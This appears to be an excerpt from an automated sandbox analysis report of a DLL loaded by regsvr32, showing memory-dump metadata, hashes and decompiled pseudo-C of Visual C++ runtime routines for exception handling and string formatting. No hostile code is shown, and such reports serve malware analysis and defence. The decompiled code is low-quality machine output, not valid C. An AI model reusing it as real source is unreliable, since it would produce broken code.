                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                • API String ID: 3320372497-2837547082

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                • API String ID: 2574300362-564504941

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                • String ID:
                                • API String ID: 641786319-0
                                • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                				long long _v24;
                                				long long _v32;
                                				char _v56;
                                				long long _v64;
                                				long long _v72;
                                				char _v80;
                                				void* _v88;
                                				void* _v96;
                                				intOrPtr _v104;
                                				void* _v112;
                                				intOrPtr _v120;
                                				void* _v128;
                                				char _v132;
                                				char _v136;
                                				long long _v144;
                                				signed int _v152;
                                				char _v160;
                                				signed char _v164;
                                				signed int _v168;
                                				char _v176;
                                				char _v184;
                                				long long _v192;
                                				signed char _v200;
                                				long long _v208;
                                				signed int _v216;
                                				signed int _v224;
                                				long long _v232;
                                				void* _t222;
                                				void* _t244;
                                				void* _t295;
                                				long long _t302;
                                				long long _t303;
                                				intOrPtr _t311;
                                				long long _t312;
                                				long long _t321;
                                				intOrPtr _t325;
                                				long long _t329;
                                				long long _t330;
                                				long long _t332;
                                
                                				_t295 = __rax;
                                				_a32 = __r9;
                                				_a24 = __r8;
                                				_a16 = __rdx;
                                				_a8 = __rcx;
                                				_v164 = 0;
                                				_v152 = 0;
                                				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
                                				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
                                				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
                                				r9d = _v168;
                                				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
                                				r9d = _v168;
                                				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                				goto 0xf9d34197;
                                				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
                                				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
                                				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
                                				goto 0xf9d341b6;
                                				_t222 = E000007FE7FEF9D2CF80(_a40);
                                				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
                                				_t302 = _a8;
                                				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
                                				0xf9d24000();
                                				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
                                				goto 0xf9d34862;
                                				0xf9d24000();
                                				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                				_a8 = _t303;
                                				0xf9d24000();
                                				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                				_v164 = 1;
                                				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
                                				goto 0xf9d34295;
                                				E000007FE7FEF9D2CF80(_a8);
                                				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
                                				_t311 = _a8;
                                				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
                                				E000007FE7FEF9D2CF80(_t311);
                                				0xf9d24000();
                                				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
                                				0xf9d24000();
                                				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                				_v144 = _t312;
                                				0xf9d24000();
                                				 *((long long*)(_t312 + 0x108)) = 0;
                                				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
                                				goto 0xf9d34398;
                                				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
                                				E000007FE7FEF9D35AB0(1, _a8);
                                				E000007FE7FEF9D34870( &_v56, "bad exception");
                                				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a160);
                                				goto 0xf9d34398;
                                				E000007FE7FEF9D2CF50(_t312);
                                				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
                                				if (_a40[3] <= 0) goto 0xf9d3466c;
                                				_v216 = _a32;
                                				_v224 =  &_v132;
                                				_t321 =  &_v136;
                                				_v232 = _t321;
                                				r9d = _v168;
                                				r8d = _a56;
                                				E000007FE7FEF9D2EA30(_a16, _a40);
                                				_v128 = _t321;
                                				goto 0xf9d3447e;
                                				_v136 = _v136 + 1;
                                				_v128 = _v128 + 0x14;
                                				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
                                				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
                                				_t325 = _v128;
                                				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
                                				goto 0xf9d3445a;
                                				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
                                				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                				_v120 = _v120 - 1;
                                				_t329 = _v112 + 0x14;
                                				_v112 = _t329;
                                				if (_v120 <= 0) goto 0xf9d34667;
                                				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
                                				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                				_v96 = _t330;
                                				E000007FE7FEF9D2E6A0(_t244, _t330);
                                				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                				goto 0xf9d3457e;
                                				_v104 = _v104 - 1;
                                				_t332 = _v96 + 4;
                                				_v96 = _t332;
                                				if (_v104 <= 0) goto 0xf9d34662;
                                				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
                                				_v88 = _t332 +  *_v96;
                                				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
                                				goto 0xf9d3455a;
                                				_v152 = 1;
                                				_v176 = _a48 & 0x000000ff;
                                				_v184 = _v164 & 0x000000ff;
                                				_v192 = _a64;
                                				_v200 = _a56;
                                				_v208 = _v128;
                                				_v216 = _v88;
                                				_v224 = _v112;
                                				_v232 = _a40;
                                				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                				goto 0xf9d34667;
                                				goto 0xf9d3455a;
                                				goto L1;
                                				goto 0xf9d3445a;
                                				__eax = _v152 & 0x000000ff;
                                				__eflags = _v152 & 0x000000ff;
                                				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
                                				__rax = _a40;
                                				__eax =  *_a40;
                                				__eax =  *_a40 & 0x1fffffff;
                                				__eflags = __eax - 0x19930521;
                                				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
                                				__rax = _a40;
                                				__eflags =  *(__rax + 0x20);
                                				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
                                				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                				_a40 = _a40[8];
                                				_v32 = __rax;
                                				goto 0xf9d346cb;
                                				_v32 = 0;
                                				__eflags = _v32;
                                				if (_v32 == 0) goto 0xf9d347d7;
                                				__rax = _a40;
                                				__eflags =  *(__rax + 0x20);
                                				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
                                				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                				_a40 = _a40[8];
                                				__rax = __rax + _a40[8];
                                				_v24 = __rax;
                                				goto 0xf9d34712;
                                				_v24 = 0;
                                				__rdx = _v24;
                                				__rcx = _a8;
                                				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                				__eflags = __al & 0x000000ff;
                                				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
                                				__rax = _a16;
                                				_v64 = _a16;
                                				__r9 =  &_v80;
                                				__r8 = _a40;
                                				__rdx = _a32;
                                				__rcx = _a16;
                                				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
                                				_v64 = __rax;
                                				_v72 = 0;
                                				__eax = _a48 & 0x000000ff;
                                				_v200 = __al;
                                				__rax = _a32;
                                				_v208 = _a32;
                                				__rax = _a40;
                                				_v216 = _a40;
                                				_v224 = 0xffffffff;
                                				_v232 = 0;
                                				__r9 = _v64;
                                				__r8 = _a24;
                                				__rdx = _a8;
                                				__rcx = _a16;
                                				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                				goto 0xf9d3484c;
                                				__rax = _a40;
                                				__eflags =  *(__rax + 0xc);
                                				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
                                				__eax = _a48 & 0x000000ff;
                                				__eflags = _a48 & 0x000000ff;
                                				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
                                				__rax = _a64;
                                				_v208 = _a64;
                                				__eax = _a56;
                                				_v216 = _a56;
                                				__eax = _v168;
                                				_v224 = _v168;
                                				__rax = _a40;
                                				_v232 = _a40;
                                				__r9 = _a32;
                                				__r8 = _a24;
                                				__rdx = _a16;
                                				__rcx = _a8;
                                				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
                                				goto 0xf9d3484c;
                                				__eax = E000007FE7FEF9D2CF50(__rax);
                                				0xf9d24000();
                                				__eflags =  *((long long*)(__rax + 0x108));
                                				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
                                				goto 0xf9d34862;
                                				return E000007FE7FEF9D2CF80(__rax);
                                			}











































                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                • String ID: bad exception$csm$csm$csm
                                • API String ID: 3498492519-820278400
                                • Opcode ID: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                • Instruction ID: 7a4295b2110f602878fc3b4740f95154d7254c41b9f584a981bc20edbc55875e
                                • Opcode Fuzzy Hash: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                • Instruction Fuzzy Hash: 6D12D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 4023976971-2293733425
                                • Opcode ID: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                • Instruction ID: 2efa9e2c76ac9a5207add94b1133c9cb1d9f002e85ba24f4cd28f4c384247538
                                • Opcode Fuzzy Hash: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                • Instruction Fuzzy Hash: 62023B72A0D7C28AE7B09B24E8447AEB7E4F380349F604125D6DC46AA9DB7EE545CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                • API String ID: 530996419-3695252689
                                • Opcode ID: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                • Instruction ID: 5e2c1cfd74ac96a9b2e41df821e9bd095c4032b9a62c445e43c495128706d0cc
                                • Opcode Fuzzy Hash: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                • Instruction Fuzzy Hash: E2D11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                • API String ID: 2192614184-1854130327
                                • Opcode ID: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                • Instruction ID: 857da3831ea488476c5fe61a9777edcdb3204cdfae2c6516af70c38e8266575f
                                • Opcode Fuzzy Hash: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                • Instruction Fuzzy Hash: 97C1F932A0D68286E7B09B55E8547BEB7E0F784344F604126E6CD87AE9CB7EE444CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-1870338870
                                • Opcode ID: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                • Instruction ID: 99087f23451225b4f7ab5820d3e4ac0e5e7a5016f389c9197bb40e17ebc05c44
                                • Opcode Fuzzy Hash: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                • Instruction Fuzzy Hash: 4ED11972A0CAC28AE7B09F64E8447AEB6E0F380349F604125D6CD47AE9DB7ED545CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 19%
                                			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                				signed int _t223;
                                				signed char _t228;
                                				intOrPtr _t263;
                                				signed int _t338;
                                				signed int _t339;
                                				signed long long _t342;
                                				intOrPtr* _t365;
                                				signed long long _t390;
                                
                                				_t338 = __rax;
                                				_a80 = _a80 | 0x00000040;
                                				_a72 = 0xa;
                                				_a72 = 0xa;
                                				_a116 = 0x10;
                                				asm("bts eax, 0xf");
                                				_a708 = 7;
                                				_a708 = 0x27;
                                				_a72 = 0x10;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                				_a84 = 0x30;
                                				_a85 = _a708 + 0x51;
                                				_a92 = 2;
                                				_a72 = 8;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                				asm("bts eax, 0x9");
                                				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                				E000007FE7FEF9D31EA0( &_a1112);
                                				_a824 = _t338;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                				E000007FE7FEF9D31EA0( &_a1112);
                                				_a824 = _t338;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                				_t339 = E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t339;
                                				goto 0xf9d3c80e;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t339;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t339;
                                				goto 0xf9d3c84b;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t339;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                				if (_a824 >= 0) goto 0xf9d3c882;
                                				_a832 =  ~_a824;
                                				asm("bts eax, 0x8");
                                				goto 0xf9d3c892;
                                				_t342 = _a824;
                                				_a832 = _t342;
                                				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                				_a832 = _a832 & _t342;
                                				if (_a116 >= 0) goto 0xf9d3c8d8;
                                				_a116 = 1;
                                				goto 0xf9d3c8f5;
                                				_a80 = _a80 & 0xfffffff7;
                                				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                				_a116 = 0x200;
                                				if (_a832 != 0) goto 0xf9d3c908;
                                				_a92 = 0;
                                				_a64 =  &_a687;
                                				_t223 = _a116;
                                				_a116 = _a116 - 1;
                                				if (_t223 > 0) goto 0xf9d3c936;
                                				if (_a832 == 0) goto 0xf9d3c9d3;
                                				_a1040 = _a72;
                                				_a816 = _t223 / _a1040 + 0x30;
                                				_a1048 = _a72;
                                				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                				_t228 = _a816 + _a708;
                                				_a816 = _t228;
                                				 *_a64 = _a816 & 0x000000ff;
                                				_a64 = _a64 - 1;
                                				goto 0xf9d3c915;
                                				_a104 = _t228;
                                				_a64 = _a64 + 1;
                                				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                				if (_a104 == 0) goto 0xf9d3ca12;
                                				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                				_a64 = _a64 - 1;
                                				 *_a64 = 0x30;
                                				_a104 = _a104 + 1;
                                				if (_a108 != 0) goto 0xf9d3cc6e;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                				_a84 = 0x2d;
                                				_a92 = 1;
                                				goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                				_a84 = 0x2b;
                                				_a92 = 1;
                                				goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                				_a84 = 0x20;
                                				_a92 = 1;
                                				_a840 = _a88 - _a104 - _a92;
                                				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                				if (_a76 == 0) goto 0xf9d3cc1d;
                                				if (_a104 <= 0) goto 0xf9d3cc1d;
                                				_a872 = 0;
                                				_a848 = _a64;
                                				_a856 = _a104;
                                				_a856 = _a856 - 1;
                                				if (_a856 == 0) goto 0xf9d3cc1b;
                                				_a1056 =  *_a848 & 0x0000ffff;
                                				r9d = _a1056 & 0x0000ffff;
                                				r8d = 6;
                                				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                				_a848 =  &(_a848[1]);
                                				if (_a872 != 0) goto 0xf9d3cbe5;
                                				if (_a860 != 0) goto 0xf9d3cbf2;
                                				_a688 = 0xffffffff;
                                				goto 0xf9d3cc1b;
                                				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                				goto 0xf9d3cb60;
                                				goto 0xf9d3cc3b;
                                				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                				if (_a688 < 0) goto 0xf9d3cc6e;
                                				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                				if (_a96 == 0) goto 0xf9d3cc8e;
                                				0xf9d25330();
                                				_a96 = 0;
                                				goto 0xf9d3b99c;
                                				if (_a704 == 0) goto 0xf9d3ccb4;
                                				if (_a704 == 7) goto 0xf9d3ccb4;
                                				_a1060 = 0;
                                				goto 0xf9d3ccbf;
                                				_a1060 = 1;
                                				_t263 = _a1060;
                                				_a876 = _t263;
                                				if (_a876 != 0) goto 0xf9d3cd05;
                                				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                				_a32 = _t365;
                                				r9d = 0;
                                				r8d = 0x8f5;
                                				0xf9d2b3b0();
                                				if (_t263 != 1) goto 0xf9d3cd05;
                                				asm("int3");
                                				if (_a876 != 0) goto 0xf9d3cd61;
                                				0xf9d2ab30();
                                				 *_t365 = 0x16;
                                				_a32 = 0;
                                				r9d = 0x8f5;
                                				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                				_a912 = 0xffffffff;
                                				E000007FE7FEF9D26800( &_a120);
                                				goto 0xf9d3cd80;
                                				_a916 = _a688;
                                				E000007FE7FEF9D26800( &_a120);
                                				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
